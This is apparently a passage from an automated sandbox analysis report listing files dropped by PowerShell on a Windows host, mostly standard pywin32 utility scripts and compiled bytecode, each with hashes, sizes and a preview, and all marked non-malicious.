                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............\...\...\..l\...\...]...\...]...\...]...\...]...\4..]...\:..]...\...]...\...\...\4..]...\4..\...\4..]...\Rich...\................PE..L...6..g....................."...............0....@.......................................@..................................9.......`.......................p..L....4..T...........................P5..@............0...............................text...3........................... ..`.rdata..8....0......."..............@..@.data........P.......8..............@....rsrc........`.......<..............@..@.reloc..L....p.......@..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18634
                                                                                                                                                                                                            Entropy (8bit):4.364856434273021
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:+xwOViImXcUaX/FvCmjLVkXTV0NGBe+iuYvDjeA:+xDAmjmXTV0NGBebuRA
                                                                                                                                                                                                            MD5:F9B3A9DA9906F9ED2DCBDA7FAC3728BD
                                                                                                                                                                                                            SHA1:7D06178CCBF3162A358C7FCBFCB99C400B43114E
                                                                                                                                                                                                            SHA-256:3196C1FA331837C88869788CF834E3BB91BE1147EF99FE6B0AD2E1D08A4FB713
                                                                                                                                                                                                            SHA-512:01779CEEF8867F10F90D05CB419575351297404EE02D3097A9654F82A5EA69AAEC4431A850548FCCE8E0ADF6D78DE6B7052565059A253E0736D84D4099E1939E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ControlService.py..#..# A simple app which duplicates some of the functionality in the..# Services applet of the control panel...#..# Suggested enhancements (in no particular order):..#..# 1. When changing the service status, continue to query the status..# of the service until the status change is complete. Use this..# information to put up some kind of a progress dialog like the CP..# applet does. Unlike the CP, allow canceling out in the event that..# the status change hangs...# 2. When starting or stopping a service with dependencies, alert..# the user about the dependent services, then start (or stop) all..# dependent services as appropriate...# 3. Allow toggling between service view and device view..# 4. Allow configuration of other service parameters such as startup..# name and password...# 5. Allow connection to remote SCMs. This is just a matter of..# reconnecting to the SCM on the remote machine; the rest of the..# code should still work the same...# 6. Either implement
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2873
                                                                                                                                                                                                            Entropy (8bit):4.75774343139171
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:OUThq+xq8kdHik8QPHnN2p5+XHeQUfdE1gimn3Kb98Gf7CyXMK7L:Okhq18kdHik8QPt2psHeDfdE6iIa+Gfz
                                                                                                                                                                                                            MD5:8C353F003AA286AD7FA1F1431AF6157B
                                                                                                                                                                                                            SHA1:E35E9A1F21D9FFE1C6716EC8D9E959997832DC95
                                                                                                                                                                                                            SHA-256:6252C0B499FB514CC94B495A7123C31B57710A60B5027A14D5525EF6D3F47F8F
                                                                                                                                                                                                            SHA-512:B895E7C2D15751CDEDE0A8B917EC9C4746CA45FBA72DDD5551433F6C2FC7B2C56C235375B75E2EE7A5733FEF25D1637777FB05FCCB5CC786C6E9328E33712DD9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# BrandProject.py..#..# Brand a VSS project with a "build number", then optionally..# stamp DLL/EXE files with version information.....import getopt..import os..import sys....import bulkstamp..import vssutil..import win32api......def BrandProject(.. vssProjectName,.. descFile,.. stampPath,.. filesToSubstitute,.. buildDesc=None,.. auto=0,.. bRebrand=0,..):.. # vssProjectName -- The name of the VSS project to brand... # descFile -- A test file containing descriptions of the files in the release... # stampPath -- The full path to where the files referenced in descFile can be found... path = win32api.GetFullPathName(stampPath).... build = vssutil.MakeNewBuildNo(vssProjectName, buildDesc, auto, bRebrand).. if build is None:.. print("Cancelled").. return.... bulkstamp.scan(build, stampPath, descFile).. for infile, outfile in filesToSubstitute:.. vssutil.SubstituteVSSInFile(vssProjectName, infile, outfile).. return 1......de
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2434
                                                                                                                                                                                                            Entropy (8bit):5.60988796014225
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Cc5nCNNsYOVo2UZaaAS0E2z91XLze4v2EaXBqUOCeXMxYel3/Hs:CWnCoYYozZ+S0z7ze4v2EaxxOC2MvNs
                                                                                                                                                                                                            MD5:6BBE9FEE6F8D5E4DD497DCF0590F71FC
                                                                                                                                                                                                            SHA1:97767BA8615DC95E66A24DBB516D57DC239DDA1C
                                                                                                                                                                                                            SHA-256:0B2B9C37C492366CADA7111AB8DE38B63F72869CB122F1791CD94FE900070F22
                                                                                                                                                                                                            SHA-512:A5B00276D2690978A08144FFA45C1EAD3561954EE45114132EDC4087A2B1923BCD35601B80659580481BDC9C26F1F81C70A3E9B90FEBAA8811D0D878AA023157
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g9........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.......d.d.d...Z.d.d...Z.e.d.k.r.d.d.l.Z.z.e...e.j.d.d.....d...\.Z.Z.W.n...e.j.yR..Z...z.e.e.....W.Y.d.Z.[.n.d.Z.[.w.w.d...Z.Z.g.Z.d.Z.e.D.])\.Z.Z.e.d.k.rgd.Z.e.d.k.rze...d.d...\.Z.Z.e...e.e.f.....e.d.k.r.e.Z.e.d.k.r.d.Z.q]e.e...d.k.r.e.d.....d.e.d.....Z.e.d...Z.e.d...Z.z.e...e.....W.n...e.y.......e.d.e.......Y.n.w.e.j...e...s.e.d.e.......e.e.e.e.e.e.e.e.....d.S.d.S.)......Nc....................C...s\...t...|...}.t...|.|.|.|...}.|.d.u.r.t.d.....d.S.t...|.|.|.....|.D.].\.}.}.t...|.|.|.....q d.S.).NZ.Cancelled.....)...win32apiZ.GetFullPathName..vssutilZ.MakeNewBuildNo..print..bulkstamp..scanZ.SubstituteVSSInFile)...vssProjectName..descFileZ.stampPathZ.filesToSubstituteZ.buildDesc..auto..bRebrand..path..build..infile..outfile..r.....~C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/scripts/VersionStamp/BrandProject.py..BrandProject....s.....................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2991
                                                                                                                                                                                                            Entropy (8bit):5.6756236771921555
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CvG+ah1rG/r3PhY8I+y5Aomo2NT5mI36I9ycPFIBf+CrvyVTgLuQujQua:CvGTGj3PC8I+aArB0IKgXFaf+CrvMTbI
                                                                                                                                                                                                            MD5:8423C0DAE57FE992BB550FD895B1DFFA
                                                                                                                                                                                                            SHA1:C2504C82155EF2E4D5DD6B8538BC580415264145
                                                                                                                                                                                                            SHA-256:7FABE9A8E774B59B7009A38D438145FC60A3D80CF2B616DA31FC23B8D52CFB58
                                                                                                                                                                                                            SHA-512:E7ABAEA0B864680D0EF8CE787DCD527FB0F416F5866B643481BD456E176325F83ED96DD636056D4401994348C7EE761783AA5F157F7BBF50D167F0FC8207A193
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.y7......e.j...e.j...e.d.........d.d.l.Z.Y.n.w.g.d...Z.d.e.e.e.f...d.e.f.d.d...Z.d.d...Z.d.e.f.d.d...Z.e.d.k.rse.e.j...d.k.rhe.d.....e...d.....e.e.j.d.d.........d.S.d.S.)......N)...Mapping)...Valuesz./../../../Lib).z.*.dllz.*.pydz.*.exez.*.ocx..vars..returnc....................C...s....d.}.|.D.]y}.t.D.]t}.t...|.|...r|t.j...|.|...}.t.j...|...\.}.}.|...d...r,|.d.d.....|...}.|.....d.k.}.t.j...|...|.v.rw|.t.j...|.....}.z.t.i.|...|.|.d.......}.t...|.|.....|.d.7.}.W.q...t.yv..}...z.t.d.|.d.|.j.d.|.j.....W.Y.d.}.~.q.d.}.~.w.w.t.d.|.....q.q.|.S.).z$Returns the number of stamped files.r......_dN.....z..exe)...description..dll.....z.Could not stamp..Error..-z&WARNING: description not provided for:)...g_patterns..fnmatch..os..path..join..splitext..endswith..lower..normcaser......win32verstampZ.stamp..OSError..print..winerror..strerror).r......debug..descriptions..dirname..names..numStamp
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4551
                                                                                                                                                                                                            Entropy (8bit):5.552334853802411
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ClFV3sHMjvDPVZ2k+XOeVt+XuQUmhXzvL8lN1dGZkKL85:ClfsC7dZ2pXOuiNBdIb5j5
                                                                                                                                                                                                            MD5:C03B232E739892BE559538F3A7CD5A5F
                                                                                                                                                                                                            SHA1:BCF0520D96BB1343C89B167E4DBD12FFBEFBC560
                                                                                                                                                                                                            SHA-256:0788ABB18E8A20D1C0C5FA81B21392EDBEECFFA1A938BC106D4821ECCE6EB958
                                                                                                                                                                                                            SHA-512:8DB2FACA646F8701045D3A36B1BC4DCACB839FC77070D4DC1144F63834E8DDAA84B0562582F6AB0DD970CA9074D83F425DD3FCC4F24647C70005FB48EC320CB2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.j.Z.e.j.j...d.d.d.d.....d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.e.d.k.rZd.Z.e.e.d.d.....d.S.d.S.)......Nz&{783CD4E0-9D54-11CF-B8EE-00608CC9A71F}.....c....................C...s$...t.j...d...}.|...t.j.t.j.t.j.....|.S.).NZ.SourceSafe)...win32com..clientZ.DispatchZ.Open..pythoncom..Missing)...ss..r.....yC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/scripts/VersionStamp/vssutil.py..GetSS....s..........r....c....................C...s:...t...}.|...|...}.|...t.j...D.].}.t.|.j.j.|.j.|.j.....q.d.S...N).r......VSSItem..GetVersions..constants..VSSFLAG_RECURSYES..print..NameZ.VersionNumber..Action)...projectNamer......project..itemr....r....r......test....s..............r....c....................C...s....d.}.|...|...}.g.}.t.t.|.....D.]6}.d.}.|.|...}.|.d...d.k.r>z.t.|.|.d...|.d.....}.|...|.....d.}.W.n.......t.......t.d.|....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4823
                                                                                                                                                                                                            Entropy (8bit):4.4788873910895255
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:5NUYxWPF69LzwQFwU10cyxYtzQ++G2drlkH7lUh+yJG1Hzf2A7V:5NBxW8+Qt01YZQSqrlkbah8HzOA7V
                                                                                                                                                                                                            MD5:035B1215EE1869FE940FA035211DBD1B
                                                                                                                                                                                                            SHA1:68FB89ED3399D8CF51FD49191ACC7FDA7855E598
                                                                                                                                                                                                            SHA-256:1B96362DA8FED571C11FC93928719427A4C2BDBC5047168F16C7FC7F2B4DBCF0
                                                                                                                                                                                                            SHA-512:1E44918241EAA72E6C326752BA052A635A39E2194B8E3433D0A8BB8B633018BA695E6C7960FD44C0C7576D893BB804797CC1332654E6D97B55CA56B6F90C0EB8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:#..# bulkstamp.py:..# Stamp versions on all files that can be found in a given tree...#..# USAGE: python bulkstamp.py <version> <root directory> <descriptions>..#..# Example: python bulkstamp.py 103 ..\win32\Build\ desc.txt..#..# <version> corresponds to the build number. It will be concatenated with..# the major and minor version numbers found in the description file...#..# Description information is pulled from an input text file with lines of..# the form:..#..# <basename> <white space> <description>..#..# For example:..#..# PyWinTypes.dll Common types for Python on Win32..# etc..#..# The product's name, major, and minor versions are specified as:..#..# name <white space> <value>..# major <white space> <value>..# minor <white space> <value>..#..# The tags are case-sensitive...#..# Any line beginning with "#" will be ignored. Empty lines are okay...#....import fnmatch..import os..import sys..from collections.abc import Mapping..from optparse import Values....try:.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5818
                                                                                                                                                                                                            Entropy (8bit):4.682552790812956
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:c2NJIVL1OWZ8vtR8mcE86Er1scorsA0ykwwcLLGfeTSUWHUb7HmHx2TRqNEOetkp:S1CFRVcd6ErqoRromWrKC7i2TUn0nC8U
                                                                                                                                                                                                            MD5:6788DE7E3B222093BCF59B33F347E0AD
                                                                                                                                                                                                            SHA1:CB1C90D7B7367295FC6AB2E973E4EB1BFAA98A8F
                                                                                                                                                                                                            SHA-256:B900209C145A95674CDE2FBE95EE2F676DF42934C3D6A02C7C8631E2D70E21FA
                                                                                                                                                                                                            SHA-512:746B6D0A056BC5E9FD974B877B38D5F840C667F05ECB187BAC5EABE60591080CD80EFA59EEB436826FEFB6F215316E23BEEC2D43F0495BE06ECAFA5C724B40E8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import time..import traceback....import pythoncom..import win32com.client..import win32com.client.gencache..import win32con....constants = win32com.client.constants....win32com.client.gencache.EnsureModule("{783CD4E0-9D54-11CF-B8EE-00608CC9A71F}", 0, 5, 0)......def GetSS():.. ss = win32com.client.Dispatch("SourceSafe").. # SS seems a bit weird. It defaults the arguments as empty strings, but.. # then complains when they are used - so we pass "Missing".. ss.Open(pythoncom.Missing, pythoncom.Missing, pythoncom.Missing).. return ss......def test(projectName):.. ss = GetSS().. project = ss.VSSItem(projectName).... for item in project.GetVersions(constants.VSSFLAG_RECURSYES):.. print(item.VSSItem.Name, item.VersionNumber, item.Action).... # item=i.Versions[0].VSSItem.. # for h in i.Versions:.. # print("h.Comment", h.Action, h.VSSItem.Name)......def SubstituteInString(inString, evalEnv):.. substChar = "$".. fields = inString.split(substChar)
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9791
                                                                                                                                                                                                            Entropy (8bit):5.345360143489232
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CM8SUvZUoj5xWyiJjoXSySySySySySUySy0MkzB88qqBpiF4f+w7/GYL+L2znsUa:t9s/5xWbJjoXSySySySySySUySymzB8x
                                                                                                                                                                                                            MD5:F965CBF7E65BB0681801C7BDE20776E6
                                                                                                                                                                                                            SHA1:6FCA257C7A33E7A693783BD16B83E479E5C50CAA
                                                                                                                                                                                                            SHA-256:C6BA2F5AC80DD94BC913C520E6977F41BCAE0AF8160E2D776F8EB775F5184E13
                                                                                                                                                                                                            SHA-512:17C4A30D16594F043582EA6B24A0192A32935C104886DA5DA5488725D5139F1353726B5235352C1414362C642F32AB4288C0D432CBA1C298D7B79D96D6FF54B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.H.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.d.k.rBd.d.l.Z.d.Z.e.e.j...d.k.r:e.j.d...Z.e.e.........d.S.d.S.)......N)...dialogc....................@...sP...e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...StartupDlg.............................c....................C...s"...t.j...|.|.........|.|._.|.|._.d.S...N).r......Dialog..__init__..GetResource..name..service)...selfZ.displaynamer......r.....sC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/scripts/ControlService.pyr....-...s..........z.StartupDlg.__init__c....................C........t...|.j.....d.S.r....)...win32service..CloseServiceHandler......r....r....r....r......__del__2..........z.StartupDlg.__del__c....................C...s....t...|.j...}.|...|.j.|.d.........d.....t...|.j...}.|.d...t.j.@.s'|.d...t.j.@.r1|...|.j.....d.....n.|...|.j.....d.....|...|.j.....d.....|...|.j.....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1221
                                                                                                                                                                                                            Entropy (8bit):5.637558626027633
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CuiwrQkQcUnKZpIWGhPawX7A3YvOxNpzx8sQrJN2L7bL/AWyj:CuskiKZppfwLA5NN6sQrJN2HfIWW
                                                                                                                                                                                                            MD5:D7B4C3BD3EB580EB2CDCD4C631FC2223
                                                                                                                                                                                                            SHA1:B5F3F515DCFB5B9003D10FEAA305290F03941E80
                                                                                                                                                                                                            SHA-256:C8969F3A23CEB80C7C6DC9763B8B2EE70052F66CCBB8A9A074FE14F8A3756216
                                                                                                                                                                                                            SHA-512:4A1345FC2DC1FDE0261613D76C5536CEA052628EBE7B37DFE3A4B6D4384C3DF7BEA48427F62DA6EAA16A167CD080337718AEBD2038B11719DC47EF03A4E33841
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sP...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e.d.k.r&e.d.....e.d.....e.d.....d.S.d.S.)......Nc....................C...s:...t...d.t...t.........}.d.}.d.}.|.rG|.d.k.r.d.}.n.d.|...}.z.t.j...t.....|...|...d.|.....d.....}.t...|.....W.n...t.y@......d.}.Y.n.w.|.d.7.}.|.s.z.t...d.|...}.W.n...t.j.yh..}...z.t.d.|.....W.Y.d.}.~.d.S.d.}.~.w.w.z-t...|...d.k.r.t.d.|.......W.t...|.....d.S.t...|.|.....t.d.|...d.|.........W.t...|.....d.S.t...|.....w.).Nz.%Y%m%d.....r......z.-%d..-z..evtz.Could not open the event logz*No records in event log %s - not backed upz.Backed up z. log to )...time..strftime..localtime..os..path..join..win32apiZ.GetTempPath..stat..OSError..win32evtlogZ.OpenEventLog..error..printZ.GetNumberOfEventLogRecordsZ.CloseEventLogZ.ClearEventLog).Z.logTypeZ.datePrefixZ.fileExists..retry..index..fnameZ.hlog..details..r.....sC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/scripts/backupEventLog.py..BackupClea
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1179
                                                                                                                                                                                                            Entropy (8bit):5.654655004114343
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:ChEU9SUAL9OVdoTVRvUH9Ily7gzgV1UR2oxA2LlPF3NWE+Jkq+:Chh9S6wRvUHqsgzgfUR2eA20E+qt
                                                                                                                                                                                                            MD5:F852CB08F583DC04051F12526665EE78
                                                                                                                                                                                                            SHA1:748A8174136D2078022B6EBCA2EDADB470BFB435
                                                                                                                                                                                                            SHA-256:ACDAE4A4549D4CFBDAA9BC252982A186880DE85FE96CF69739C439EF5C9884AB
                                                                                                                                                                                                            SHA-512:2FB6750ADCE8CAB720831936DF619C1175798AC080B9D467C20376D42EB8F8ADF62B82F8982F196849FDD5B4E265700CD6889731ED3C2BFCBC578AEEB01A140D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e.d.k.rJe.e.j...d.k.rDe.j.d.d.....D.].Z.e.e...Z.e.r;e.e.....e.d.....e.......q&e.d.e.......q&d.S.e.d.....d.S.d.S.)......Nc....................C...s....z.t...d.d.|.....W.n.......Y.t...|...}.z.|...t.........W.n...t.y%......Y.n.w.t.|...d.k.r2d.|...}.|.S.t.|...d.k.rCd.|...d.|...d...}.|.S.t...t.j.d.|.d.....}.t...|.d.....t...|.....d.}.|.S.).N..Processz.ID Processr....z.Can't find %s.....z.Found too many z.'s - pids=`..`..)...win32pdhutilZ.GetPerformanceAttributesZ.FindPerformanceAttributesByName..remove..win32apiZ.GetCurrentProcessId..ValueError..len..OpenProcess..win32conZ.PROCESS_TERMINATE..TerminateProcess..CloseHandle)...procnameZ.pids..result..handle..r.....qC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/scripts/killProcName.py..killProcName....s*.............................................r......__main__r....z.Dumping all processes...z.Killed %sz#Usage: killP
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2718
                                                                                                                                                                                                            Entropy (8bit):5.4713406568174525
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CK/hR23BusCf1X69f0+FaGtnZkNH4PcIjqYv1aElKub+Yd/K/hcm:CygBuse1K9xFnnZkNOHjqg1ayKub+Yd2
                                                                                                                                                                                                            MD5:4C8E1803C2F1D598407AD3E65FCB59F6
                                                                                                                                                                                                            SHA1:246ECEEABFDE97D8E3E97C96B2E53B342F474E30
                                                                                                                                                                                                            SHA-256:4C120BED5CA98E382746B985B419B553B949F393911B2EB0CF5971DDBA7FEAB4
                                                                                                                                                                                                            SHA-512:546833CA953BBB954085B543D2C9BAAA4106D12459CF417F6554D4C0D38ABF8A1945F21CA2C29FD70464D316E546827326148E9F6452531BC012BC85AB7FBFA0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.G.d.d...d.e...Z.d.d.d...Z.d.d...Z.d.Z.d.d...Z.e.d.k.r~d.d.l.Z.z.e...e.j.d.d.....d...\.Z.Z.W.n...e.j.yQ..Z...z.e.e.....W.Y.d.Z.[.n.d.Z.[.w.w.d.Z.e.e...d.k.r^e.d.....e.D.].\.Z.Z.e.d.k.rme.e.e.....e.d.k.rue.e.....e.d.k.r}e.e...Z.q`d.S.d.S.)......Nc....................@...s....e.Z.d.Z.d.S.)...ConnectionErrorN)...__name__..__module__..__qualname__..r....r.....lC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/scripts/rasutil.pyr........s........r.........c....................C...s....|.d.k.s.J...t.....D.].}.|.d.......|.....k.r#t.d.|.....d.|.d...f.....S.q.t...d.|...\.}.}.|.s;t.d.....t.d.....t...d.....t.d.|.d.....|.}.|.d.k.rjt...d.d.|.d...\.}.}.t...|...rYd.}.n.t.d.....t...d.....|.d.8.}.|.d.k.sG|.rtt.|.t...|.......d.|.f.S.).aa...Make a connection to the specified RAS entry... Returns a tuple of (bool, handle) on success.. - bool is 1 if a new connection was established, or 0 is a
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15725
                                                                                                                                                                                                            Entropy (8bit):5.563528726745333
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:JNkiZewjR/uJMxLBpW8pLJocF/3yoKBPBI5lwa3CQIXLT:okjR11BpWIByouPBEsX
                                                                                                                                                                                                            MD5:BA6C378232E7BDB614F81B0DD3A29CAC
                                                                                                                                                                                                            SHA1:C95F799A02D8697BE5F664653272DF5C905546E6
                                                                                                                                                                                                            SHA-256:B9131CA1B92C9F91BC97751D9BFCB5866EE170E1B944A515DDDF81351C18A559
                                                                                                                                                                                                            SHA-512:08DE749EAE001D44506858E3CCDF27E7569D13C07675182EE5CEAE4CE71A2BDBFCD8B9BF9E3E4CF76988FB3ED09B4DE04F34DC601F4787A756A3D1D9D4DB5C2F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gBR.......................@...s....G.d.d...d.e...Z.d.d.l.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.dPd.d...Z.d.d...Z.dPd.d...Z.d d!..Z.dPd"d#..Z.dPd$d%..Z.d&d'..Z.d(d)..Z.d*e.j.d.....Z.d+Z.d,Z.e.d-k...r.e.e.j...d.k.r.e.j.d...d/v.r.e.e.....d.S.e.e.j...d.k.s.e.j.d...d...d0v.r.e.j.d.d.....Z.e.j.d.d.....D.].Z.e.. e.....q.e.. d1....e.. d2....e.. d3....e.. d4....e.. d5....e.. d6....d7e.j!v.r.e.. d8....n.e.. d9....e.d:....e.e.....e.e.....e.d;e.d<....e.d=....d.d.l"Z"e".#....d.S.g.Z$d.d.l%Z%e%.%e.j.d.d.....d>g.d?....\.Z&Z'e'D.].Z.e$. e.......q.e&D.].\.Z(Z)e(d@k...r$e.e.....e(dAk...r-e.e.....e(dBk...r:e.dC....e.e$....e(dDk...rJe.dEe)....e.e)d.e$....e(dFv...r]d.d.l*Z*e.dGe)....e*.+e)....e(dHk...rxd.d.l*Z*dI.,e$..Z.e.dJe)dKe.....e*.-e)e.....e(dLk...r.e.e$....s.e.dM....d.d.l*Z*e*..d..../dI..Z0e.e0..Z1e$D.].Z2e2e0v...r.e0. e2......q.e.e0..e1k...r.e.dNe.e0..e1........e*.-d.dI.,e0........q.e.dO......q.d.S.d.S.)Qc....................@...s....e.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3203
                                                                                                                                                                                                            Entropy (8bit):5.512597861475114
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CvJu+OpvYYAw96e9WVqc4krl2FXPLbJhVqnOtF/chI:CJBxaT4V54zFXPfJhaOtF0hI
                                                                                                                                                                                                            MD5:3E3AEEB552014FB5CC54EC08352C36FD
                                                                                                                                                                                                            SHA1:8A371101B3F6B93CD712CDFE06E02358FDFCC9AF
                                                                                                                                                                                                            SHA-256:AA094E85F5ABBB00DEA3D268B85489BDD71D16EFCDA3BE0F4FCDB05A26183058
                                                                                                                                                                                                            SHA-512:9E13047A62BD050EE5974C195F8A34DE4C25515FE6D27294B3C0686AC14F72CD0F1AE6E83D5E763F6BE1C14310F654E4F8D810A6FC02738101DB8D20BE381ADE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g<........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e.j...e.j...e.j.....d.....d...r4e.d.....e.d.....e.d.....z.d.d.l.Z.W.n%..e.y_..Z...z.e.d.....e.d.e.........e.d.....e.d.....W.Y.d.Z.[.n.d.Z.[.w.w.z.d.d.l.Z.W.n%..e.y...Z...z.e.d.....e.d.e.........e.d.....e.d.....W.Y.d.Z.[.n.d.Z.[.w.w.d.d...Z.d.d...Z.d.d...Z.e.j...e...e.j.......\.Z.Z.\.Z.Z.e.j...e...\.Z.Z.e.e.d...e...e.....e.d.e.j.....e.d.e.j.....e.d.....d.S.)......Nc....................C...sJ...t.....t.d.....t.d.....t.d.....t.....t.d.....t.d.....t.d.....t...|.....d.S.).Nz=This script is designed to copy and register the Python debugz>binaries. It looks for pythonXX_d.dll, pythoncomXX_d.dll etc,z=and installs them to work correctly with Python debug builds.z9You will generally find this script in the. zip file thatz5included these _d files. Please run this script fromz.that directory)...print..sys..exit)...rc..r.....lC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-pac
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1288
                                                                                                                                                                                                            Entropy (8bit):4.602950852484746
                                                                                                                                                                                                            Encrypted:false
